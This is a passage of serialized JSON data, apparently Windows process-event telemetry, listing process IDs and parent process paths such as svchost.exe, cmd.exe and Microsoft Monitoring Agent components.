(4100)\",\"PID: 0x848 (2120)\",\"PID: 0x162c (5676)\",\"PID: 0x1ce4 (7396)\",\"PID: 0x1be0 (7136)\",\"PID: 0xd74 (3444)\",\"PID: 0x1d44 (7492)\",\"PID: 0x48c (1164)\",\"PID: 0x19f0 (6640)\",\"PID: 0x5c4 (1476)\",\"PID: 0x1db4 (7604)\",\"PID: 0x12cc (4812)\",\"PID: 0x1df8 (7672)\",\"PID: 0x1ff8 (8184)\",\"PID: 0xd78 (3448)\",\"PID: 0xdd0 (3536)\",\"PID: 0x12f8 (4856)\",\"PID: 0xf94 (3988)\",\"PID: 0x1eb4 (7860)\",\"PID: 0x58 (88)\",\"PID: 0x135c (4956)\",\"PID: 0x1b28 (6952)\",\"PID: 0x1e60 (7776)\",\"PID: 0xf90 (3984)\",\"PID: 0x508 (1288)\",\"PID: 0x21b0 (8624)\",\"PID: 0x494 (1172)\",\"PID: 0x378 (888)\",\"PID: 0x2168 (8552)\",\"PID: 0x254 (596)\",\"PID: 0x2328 (9000)\",\"PID: 0x1834 (6196)\",\"PID: 0xcc0 (3264)\",\"PID: 0x15f8 (5624)\",\"PID: 0x1f7c (8060)\",\"PID: 0x2274 (8820)\",\"PID: 0x22fc (8956)\",\"PID: 0x15c0 (5568)\",\"PID: 0x19c8 (6600)\",\"PID: 0x19e8 (6632)\",\"PID: 0xf98 (3992)\",\"PID: 0xbbc (3004)\",\"PID: 0xb70 (2928)\",\"PID: 0x1590 (5520)\",\"PID: 0x2298 (8856)\",\"PID: 0xe58 (3672)\",\"PID: 0x15e4 (5604)\",\"PID: 0x1f00 (7936)\",\"PID: 0x2384 (9092)\",\"PID: 0xa24 (2596)\",\"PID: 0x1070 (4208)\",\"PID: 0x1df4 (7668)\",\"PID: 0x2044 (8260)\",\"PID: 0x1520 (5408)\",\"PID: 0xedc (3804)\",\"PID: 0x1634 (5684)\",\"PID: 0x1b28 (6952)\",\"PID: 0xd7c (3452)\",\"PID: 0x182c (6188)\",\"PID: 0x2070 (8304)\",\"PID: 0x1f2c (7980)\",\"PID: 0x6f8 (1784)\",\"PID: 0x10c4 (4292)\",\"PID: 0x1de4 (7652)\",\"PID: 0x5ac (1452)\",\"PID: 0x864 (2148)\",\"PID: 0x518 (1304)\",\"PID: 0x1d44 (7492)\",\"PID: 0x48c (1164)\",\"PID: 0xb10 (2832)\",\"PID: 0x5c4 (1476)\",\"PID: 0x23ec (9196)\",\"PID: 0xde4 (3556)\",\"PID: 0x20e4 (8420)\",\"PID: 0x838 (2104)\",\"PID: 0x1914 (6420)\",\"PID: 0x1860 (6240)\",\"PID: 0x1f7c (8060)\",\"PID: 0x1454 (5204)\",\"PID: 0x7c0 (1984)\",\"PID: 0x1844 (6212)\",\"PID: 0x900 (2304)\",\"PID: 0x22c0 (8896)\",\"PID: 0x1ef4 (7924)\",\"PID: 0x11ec (4588)\",\"PID: 0x1d3c (7484)\",\"PID: 0x2010 (8208)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x195c (6492)\",\"PID: 0x600 (1536)\",\"PID: 0xc60 (3168)\",\"PID: 0x1ce8 (7400)\",\"PID: 0x13e0 (5088)\",\"PID: 0x770 (1904)\",\"PID: 0xb70 (2928)\",\"PID: 0x1f84 (8068)\",\"PID: 0xed8 (3800)\",\"PID: 0x21b4 (8628)\",\"PID: 0x1998 (6552)\",\"PID: 0x2204 (8708)\",\"PID: 0x21b0 (8624)\",\"PID: 0x594 (1428)\",\"PID: 0x17e0 (6112)\",\"PID: 0x22b0 (8880)\",\"PID: 0xa2c (2604)\",\"PID: 0x1a00 (6656)\",\"PID: 0x3c4 (964)\",\"PID: 0x1de4 (7652)\",\"PID: 0x2178 (8568)\",\"PID: 0x980 (2432)\",\"PID: 0x1fe0 (8160)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x14ec (5356)\",\"PID: 0xcc8 (3272)\",\"PID: 0xfcc (4044)\",\"PID: 0x1280 (4736)\",\"PID: 0x6f8 (1784)\",\"PID: 0x1a5c (6748)\",\"PID: 0x8bc (2236)\",\"PID: 0x13e4 (5092)\",\"PID: 0x1f60 (8032)\",\"PID: 0x10a4 (4260)\",\"PID: 0x107c (4220)\",\"PID: 0x2130 (8496)\",\"PID: 0x1338 (4920)\",\"PID: 0xc68 (3176)\",\"PID: 0x21d4 (8660)\",\"PID: 0xa94 (2708)\",\"PID: 0x8f0 (2288)\",\"PID: 0x1c20 (7200)\",\"PID: 0x10bc (4284)\",\"PID: 0x12cc (4812)\",\"PID: 0x13a8 (5032)\",\"PID: 0xb48 (2888)\",\"PID: 0x23d8 (9176)\",\"PID: 0x1480 (5248)\",\"PID: 0x15fc (5628)\",\"PID: 0x2298 (8856)\",\"PID: 0x1a44 (6724)\",\"PID: 0x21b4 (8628)\",\"PID: 0x1928 (6440)\",\"PID: 0xdd8 (3544)\",\"PID: 0x1488 (5256)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x850 (2128)\",\"PID: 0x1898 (6296)\",\"PID: 0x2120 (8480)\",\"PID: 0x854 (2132)\",\"PID: 0x91c (2332)\",\"PID: 0x22f4 (8948)\",\"PID: 0xb64 (2916)\",\"PID: 0x1a9c (6812)\",\"PID: 0x17d0 (6096)\",\"PID: 0x17d8 (6104)\",\"PID: 0xd14 (3348)\",\"PID: 0x128c (4748)\",\"PID: 0xb04 (2820)\",\"PID: 0x1c20 (7200)\",\"PID: 0x1360 (4960)\",\"PID: 0x19f0 (6640)\",\"PID: 0x1db0 (7600)\",\"PID: 0xb60 (2912)\",\"PID: 0x125c (4700)\",\"PID: 0x1590 (5520)\",\"PID: 0x11a8 (4520)\",\"PID: 0x1914 (6420)\",\"PID: 0x1058 (4184)\",\"PID: 0x1518 (5400)\",\"PID: 0x5a8 (1448)\",\"PID: 0x53c (1340)\",\"PID: 0x1394 (5012)\",\"PID: 0x838 (2104)\",\"PID: 0x15a8 (5544)\",\"PID: 0x1cdc (7388)\",\"PID: 0x1948 (6472)\",\"PID: 0x634 (1588)\",\"PID: 0x1e8c (7820)\",\"PID: 0x181c (6172)\",\"PID: 0x1b50 (6992)\",\"PID: 0x1e68 (7784)\",\"PID: 0x2348 (9032)\",\"PID: 0x125c (4700)\",\"PID: 0x1374 (4980)\",\"PID: 0xd58 (3416)\",\"PID: 0x2230 (8752)\",\"PID: 0x13c0 (5056)\",\"PID: 0x4e0 (1248)\",\"PID: 0x12e0 (4832)\",\"PID: 0xe00 (3584)\",\"PID: 0xbd0 (3024)\",\"PID: 0xe58 (3672)\",\"PID: 0x1850 (6224)\",\"PID: 0x23ec (9196)\",\"PID: 0x16f4 (5876)\",\"PID: 0x1b74 (7028)\",\"PID: 0x12d0 (4816)\",\"PID: 0x1610 (5648)\",\"PID: 0x648 (1608)\",\"PID: 0x23b8 (9144)\",\"PID: 0xf54 (3924)\",\"PID: 0x20b0 (8368)\",\"PID: 0x1dec (7660)\",\"PID: 0x1bbc (7100)\",\"PID: 0xa24 (2596)\",\"PID: 0x16bc (5820)\",\"PID: 0xf80 (3968)\",\"PID: 0xf08 (3848)\",\"PID: 0xe50 (3664)\",\"PID: 0x490 (1168)\",\"PID: 0xa58 (2648)\",\"PID: 0x1b00 (6912)\",\"PID: 0x23a4 (9124)\",\"PID: 0x1d9c (7580)\",\"PID: 0x1398 (5016)\",\"PID: 0xb28 (2856)\",\"PID: 0x2164 (8548)\",\"PID: 0x1198 (4504)\",\"PID: 0xd04 (3332)\",\"PID: 0xce0 (3296)\",\"PID: 0x3b8 (952)\",\"PID: 0x1f60 (8032)\",\"PID: 0xe08 (3592)\",\"PID: 0x10ac (4268)\",\"PID: 0xb38 (2872)\",\"PID: 0x1480 (5248)\",\"PID: 0xe2c (3628)\",\"PID: 0x1860 (6240)\",\"PID: 0x2048 (8264)\",\"PID: 0x128c (4748)\",\"PID: 0xed8 (3800)\",\"PID: 0x107c (4220)\",\"PID: 0x13f8 (5112)\",\"PID: 0x1940 (6464)\",\"PID: 0x212c (8492)\",\"PID: 0x1f88 (8072)\",\"PID: 0xbd0 (3024)\",\"PID: 0x438 (1080)\",\"PID: 0xbd8 (3032)\",\"PID: 0x115c (4444)\",\"PID: 0x203c (8252)\",\"PID: 0x21b0 (8624)\",\"PID: 0x2328 (9000)\",\"PID: 0x1b28 (6952)\",\"PID: 0xfe0 (4064)\",\"PID: 0x258 (600)\",\"PID: 0x770 (1904)\",\"PID: 0x84c (2124)\",\"PID: 0x248 (584)\",\"PID: 0x2018 (8216)\",\"PID: 0xd70 (3440)\",\"PID: 0xccc (3276)\",\"PID: 0x1680 (5760)\",\"PID: 0x1260 (4704)\",\"PID: 0x23f8 (9208)\",\"PID: 0x1bb4 (7092)\",\"PID: 0xcfc (3324)\",\"PID: 0xdd8 (3544)\",\"PID: 0x1408 (5128)\",\"PID: 0x1ce8 (7400)\",\"PID: 0x1d08 (7432)\",\"PID: 0x1178 (4472)\",\"PID: 0x1dd8 (7640)\",\"PID: 0x10c4 (4292)\",\"PID: 0x1a5c (6748)\",\"PID: 0x8f8 (2296)\",\"PID: 0x2018 (8216)\",\"PID: 0x17ec (6124)\",\"PID: 0x594 (1428)\",\"PID: 0x1f88 (8072)\",\"PID: 0x14d8 (5336)\",\"PID: 0x1b28 (6952)\",\"PID: 0xfc0 (4032)\",\"PID: 0xfc8 (4040)\",\"PID: 0x212c (8492)\",\"PID: 0x23a8 (9128)\",\"PID: 0x1680 (5760)\",\"PID: 0x23e8 (9192)\",\"PID: 0x55c (1372)\",\"PID: 0xadc (2780)\",\"PID: 0x1398 (5016)\",\"PID: 0x1750 (5968)\",\"PID: 0x11f0 (4592)\",\"PID: 0x5ac (1452)\",\"PID: 0xa90 (2704)\",\"PID: 0xc4c (3148)\",\"PID: 0xb00 (2816)\",\"PID: 0x154c (5452)\",\"PID: 0xeb0 (3760)\",\"PID: 0x960 (2400)\",\"PID: 0x158c (5516)\",\"PID: 0x1be0 (7136)\",\"PID: 0x2dc (732)\",\"PID: 0x221c (8732)\",\"PID: 0xc98 (3224)\",\"PID: 0x248 (584)\",\"PID: 0x1878 (6264)\",\"PID: 0x84c (2124)\",\"PID: 0x1898 (6296)\",\"PID: 0x6c0 (1728)\",\"PID: 0x125c (4700)\",\"PID: 0x1374 (4980)\",\"PID: 0xf58 (3928)\",\"PID: 0x67c (1660)\",\"PID: 0xefc (3836)\",\"PID: 0x13d8 (5080)\",\"PID: 0x19e8 (6632)\",\"PID: 0x7fc (2044)\",\"PID: 0x107c (4220)\",\"PID: 0x1ef4 (7924)\",\"PID: 0x19f4 (6644)\",\"PID: 0x2020 (8224)\",\"PID: 0x918 (2328)\",\"PID: 0xf20 (3872)\",\"PID: 0x1008 (4104)\",\"PID: 0x23ec (9196)\",\"PID: 0x2274 (8820)\",\"PID: 0x1f88 (8072)\",\"PID: 0x239c (9116)\",\"PID: 0x1770 (6000)\",\"PID: 0xfc0 (4032)\",\"PID: 0x7f8 (2040)\",\"PID: 0x1860 (6240)\",\"PID: 0x1dec (7660)\",\"PID: 0xb00 (2816)\",\"PID: 0xeb0 (3760)\",\"PID: 0x158c (5516)\",\"PID: 0x794 (1940)\",\"PID: 0x458 (1112)\",\"PID: 0x1b00 (6912)\",\"PID: 0xb28 (2856)\",\"PID: 0x634 (1588)\",\"PID: 0x16a8 (5800)\",\"PID: 0x1e68 (7784)\",\"PID: 0xa98 (2712)\",\"PID: 0x14c8 (5320)\",\"PID: 0x6c0 (1728)\",\"PID: 0x22c0 (8896)\",\"PID: 0x2280 (8832)\",\"PID: 0xccc (3276)\",\"PID: 0x67c (1660)\",\"PID: 0x878 (2168)\",\"PID: 0x13d8 (5080)\",\"PID: 0x1458 (5208)\",\"PID: 0xa24 (2596)\",\"PID: 0x1cd8 (7384)\",\"PID: 0x1420 (5152)\",\"PID: 0x8f8 (2296)\",\"PID: 0xc5c (3164)\",\"PID: 0x1f88 (8072)\",\"PID: 0x1cd8 (7384)\",\"PID: 0x19d8 (6616)\",\"PID: 0x1e3c (7740)\",\"PID: 0x1a9c (6812)\",\"PID: 0x1770 (6000)\",\"PID: 0x1260 (4704)\",\"PID: 0x55c (1372)\",\"PID: 0x115c (4444)\",\"PID: 0x2068 (8296)\",\"PID: 0x11dc (4572)\",\"PID: 0x13e4 (5092)\",\"PID: 0x1524 (5412)\",\"PID: 0x17b0 (6064)\",\"PID: 0x8c4 (2244)\",\"PID: 0x2228 (8744)\",\"PID: 0x1cf0 (7408)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xa90 (2704)\",\"PID: 0x11a8 (4520)\",\"PID: 0x173c (5948)\",\"PID: 0x1910 (6416)\",\"PID: 0x1db4 (7604)\",\"PID: 0x438 (1080)\",\"PID: 0x2018 (8216)\",\"PID: 0x21c8 (8648)\",\"PID: 0x2044 (8260)\",\"PID: 0x2200 (8704)\",\"PID: 0x1124 (4388)\",\"PID: 0xd44 (3396)\",\"PID: 0x1c24 (7204)\",\"PID: 0x1198 (4504)\",\"PID: 0x135c (4956)\",\"PID: 0xd04 (3332)\",\"PID: 0x2364 (9060)\",\"PID: 0x1110 (4368)\",\"PID: 0x994 (2452)\",\"PID: 0x2328 (9000)\",\"PID: 0x6d4 (1748)\",\"PID: 0x20e4 (8420)\",\"PID: 0x1998 (6552)\",\"PID: 0xf54 (3924)\",\"PID: 0x5a8 (1448)\",\"PID: 0x1db8 (7608)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x604 (1540)\",\"PID: 0x1f24 (7972)\",\"PID: 0x518 (1304)\",\"PID: 0x2170 (8560)\",\"PID: 0x12a8 (4776)\",\"PID: 0x200c (8204)\",\"PID: 0xf80 (3968)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xccc (3276)\",\"PID: 0xd7c (3452)\",\"PID: 0x1634 (5684)\",\"PID: 0x1748 (5960)\",\"PID: 0x1898 (6296)\",\"PID: 0x1eb4 (7860)\",\"PID: 0x1468 (5224)\",\"PID: 0x2200 (8704)\",\"PID: 0x1e8c (7820)\",\"PID: 0x2348 (9032)\",\"PID: 0x11f0 (4592)\",\"PID: 0x1f20 (7968)\",\"PID: 0x1480 (5248)\",\"PID: 0x220 (544)\",\"PID: 0x980 (2432)\",\"PID: 0x1704 (5892)\",\"PID: 0x1520 (5408)\",\"PID: 0x16cc (5836)\",\"PID: 0xfd4 (4052)\",\"PID: 0x53c (1340)\",\"PID: 0xbbc (3004)\",\"PID: 0x23e8 (9192)\",\"PID: 0xdf8 (3576)\",\"PID: 0x1c50 (7248)\",\"PID: 0x394 (916)\",\"PID: 0x105c (4188)\",\"PID: 0xd44 (3396)\",\"PID: 0x994 (2452)\",\"PID: 0x17e0 (6112)\",\"PID: 0xa58 (2648)\",\"PID: 0x1564 (5476)\",\"PID: 0x1328 (4904)\",\"PID: 0x1e3c (7740)\",\"PID: 0x1fa8 (8104)\",\"PID: 0x12d4 (4820)\",\"PID: 0x1f38 (7992)\",\"PID: 0x239c (9116)\",\"PID: 0x2320 (8992)\",\"PID: 0x1f3c (7996)\",\"PID: 0x11f0 (4592)\",\"PID: 0x864 (2148)\",\"PID: 0x8dc (2268)\",\"PID: 0x183c (6204)\",\"PID: 0xd74 (3444)\",\"PID: 0x21c8 (8648)\",\"PID: 0x6f8 (1784)\",\"PID: 0x1c24 (7204)\",\"PID: 0x1fc0 (8128)\",\"PID: 0x17a4 (6052)\",\"PID: 0x10bc (4284)\",\"PID: 0x1c10 (7184)\",\"PID: 0xb48 (2888)\",\"PID: 0x235c (9052)\",\"PID: 0xbd0 (3024)\",\"PID: 0x1468 (5224)\",\"PID: 0x15c8 (5576)\",\"PID: 0x1278 (4728)\",\"PID: 0xe34 (3636)\",\"PID: 0xbc (188)\",\"PID: 0x53c (1340)\",\"PID: 0x1834 (6196)\",\"PID: 0xef4 (3828)\",\"PID: 0x15f4 (5620)\",\"PID: 0xcd8 (3288)\",\"PID: 0xfd4 (4052)\",\"PID: 0x181c (6172)\",\"PID: 0xbc (188)\",\"PID: 0x1b28 (6952)\",\"PID: 0x1d6c (7532)\",\"PID: 0x15f4 (5620)\",\"PID: 0xda8 (3496)\",\"PID: 0x16e0 (5856)\",\"PID: 0xbb4 (2996)\",\"PID: 0x11f4 (4596)\",\"PID: 0x12d0 (4816)\",\"PID: 0xce0 (3296)\",\"PID: 0x1994 (6548)\",\"PID: 0x123c (4668)\",\"PID: 0x20b0 (8368)\",\"PID: 0xccc (3276)\",\"PID: 0x14ec (5356)\",\"PID: 0xda8 (3496)\",\"PID: 0x1cfc (7420)\",\"PID: 0x7fc (2044)\",\"PID: 0x108c (4236)\",\"PID: 0x798 (1944)\",\"PID: 0x22e0 (8928)\",\"PID: 0x172c (5932)\",\"PID: 0x1dec (7660)\",\"PID: 0xe2c (3628)\",\"PID: 0x1080 (4224)\",\"PID: 0xb14 (2836)\",\"PID: 0x17ec (6124)\",\"PID: 0x1898 (6296)\",\"PID: 0x1058 (4184)\",\"PID: 0xe1c (3612)\",\"PID: 0x834 (2100)\",\"PID: 0x17c4 (6084)\",\"PID: 0x88c (2188)\",\"PID: 0x2e4 (740)\",\"PID: 0x108c (4236)\",\"PID: 0x1360 (4960)\",\"PID: 0x19f4 (6644)\",\"PID: 0x19f0 (6640)\",\"PID: 0x1570 (5488)\",\"PID: 0x17a8 (6056)\",\"PID: 0x1058 (4184)\",\"PID: 0x82c (2092)\",\"PID: 0xd44 (3396)\",\"PID: 0x1bfc (7164)\",\"PID: 0x1998 (6552)\",\"PID: 0x1c10 (7184)\",\"PID: 0x1184 (4484)\",\"PID: 0xc6c (3180)\",\"PID: 0x454 (1108)\",\"PID: 0x65c (1628)\",\"PID: 0xe1c (3612)\",\"PID: 0x1070 (4208)\",\"PID: 0x1ce8 (7400)\",\"PID: 0xb10 (2832)\",\"PID: 0x2260 (8800)\",\"PID: 0x1c54 (7252)\",\"PID: 0x181c (6172)\",\"PID: 0x8c0 (2240)\",\"PID: 0x1f60 (8032)\",\"PID: 0x123c (4668)\",\"PID: 0x518 (1304)\",\"PID: 0xc98 (3224)\",\"PID: 0x1cdc (7388)\",\"PID: 0x1484 (5252)\",\"PID: 0xb14 (2836)\",\"PID: 0x16bc (5820)\",\"PID: 0x1bb4 (7092)\",\"PID: 0x1be4 (7140)\",\"PID: 0xec4 (3780)\",\"PID: 0xd68 (3432)\",\"PID: 0xb64 (2916)\",\"PID: 0x1eb4 (7860)\",\"PID: 0xc98 (3224)\",\"PID: 0x6f8 (1784)\",\"PID: 0x84c (2124)\",\"PID: 0x1d6c (7532)\",\"PID: 0x490 (1168)\",\"PID: 0x16d4 (5844)\",\"PID: 0xa2c (2604)\",\"PID: 0x65c (1628)\",\"PID: 0x12fc (4860)\",\"PID: 0xd78 (3448)\",\"PID: 0x221c (8732)\",\"PID: 0x1238 (4664)\",\"PID: 0x1584 (5508)\",\"PID: 0x7c8 (1992)\",\"PID: 0x1420 (5152)\",\"PID: 0x20e4 (8420)\",\"PID: 0x9ac (2476)\",\"PID: 0x1078 (4216)\",\"PID: 0x1ea8 (7848)\",\"PID: 0x1a44 (6724)\",\"PID: 0x15b8 (5560)\",\"PID: 0x1da8 (7592)\",\"PID: 0x99c (2460)\",\"PID: 0x974 (2420)\",\"PID: 0x2280 (8832)\",\"PID: 0x205c (8284)\",\"PID: 0x1360 (4960)\",\"PID: 0x11d4 (4564)\",\"PID: 0xaec (2796)\",\"PID: 0x1cc4 (7364)\",\"PID: 0x220c (8716)\",\"PID: 0xc14 (3092)\",\"PID: 0x1f24 (7972)\",\"PID: 0x1b74 (7028)\",\"PID: 0x1620 (5664)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft 